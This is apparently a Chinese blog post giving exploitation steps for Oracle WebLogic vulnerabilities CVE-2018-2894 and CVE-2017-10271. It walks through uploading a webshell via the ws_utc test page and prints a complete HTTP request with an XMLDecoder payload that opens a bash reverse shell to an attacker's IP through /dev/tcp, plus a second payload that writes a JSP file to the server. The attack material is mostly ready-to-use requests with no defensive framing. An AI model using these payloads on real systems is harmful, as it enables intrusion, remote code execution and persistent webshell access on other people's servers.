Weblogic漏洞

Weblogic任意文件上传(CVE-2018-2894)

受影响版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

漏洞存在前提

后台base_domain设置中启用web服务测试页

利用漏洞方法

  1. 访问
http://xxx.com/ws_utc/config.do
  1. 设置Work Home Dir为
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的,然后提交。

  1. 点击"安全",添加,弹出登录框,点击“浏览”上传webshell并抓包

  2. 找到响应包中的时间戳

访问http://xxx.com/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

Weblogic反序列化 (CVE-2017-10271)

受影响版本

10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0
  1. 初步漏洞判断
/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

  1. 反弹shell (发送数据xml时,反弹shell语句,要进行编码。)

    payload:
POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 192.168.74.154:7001

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: text/hAccept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 639

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/接收shell的ip/1234 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>
  1. 写入shell
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

    <soapenv:Header>

    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

    <java><java version="1.4.0" class="java.beans.XMLDecoder">

    <object class="java.io.PrintWriter">

    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>

    <void method="println"><string>

    <![CDATA[

<% out.print("test"); %>

    ]]>

    </string>

    </void>

    <void method="close"/>

    </object></java></java>

    </work:WorkContext>

    </soapenv:Header>

    <soapenv:Body/>

</soapenv:Envelope>

访问写入文件:

WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628)

https://blog.csdn.net/csacs/article/details/87122472

最新文章

  1. EC笔记,第二部分:7.为多态基类声明虚析构函数
  2. ubuntu下mediawiki的使用
  3. 好文推荐系列---------JS模板引擎
  4. ghost系统到硬盘完后,重启进入winxp安装的画面变成了蓝屏
  5. awesome-nlp
  6. storage size of ‘oldact’ isn’t known
  7. BZOJ 2818GCD
  8. Spring 数据源配置二:多数据源
  9. WordPress WP-Realty插件‘listing_id’参数SQL注入漏洞
  10. 乐在其中设计模式(C#) - 装饰模式(Decorator Pattern)
  11. Spring.NET学习
  12. 使用SQL Server Management Studio 创建作业备份数据库
  13. [原创]MongoDB综合实例一
  14. python3 Serial 串口助手的接收读取数据
  15. Windows四大傻X功能——那些拖慢系统性能的罪魁祸首
  16. 5-5 re模块 正则表达式
  17. mysql相关SQL
  18. 微信小程序的视频教程
  19. wildFly(Jboss as)入门
  20. 利用cURL会话获取一个网页

热门文章

  1. WebService的简单Demo
  2. javaScript编写9*9口诀
  3. 一次MySQL死锁的排查记录
  4. 被自己以为的GZIP秀到了
  5. 一言不合就开始搞JDK源码
  6. wdcp 安装
  7. 我与CSDN的第一百天
  8. 【Azure Redis 缓存】Azure Redis功能性讨论
  9. ctfhub技能树—文件上传—无验证
  10. java 不利用第三个变量的情况下将值互换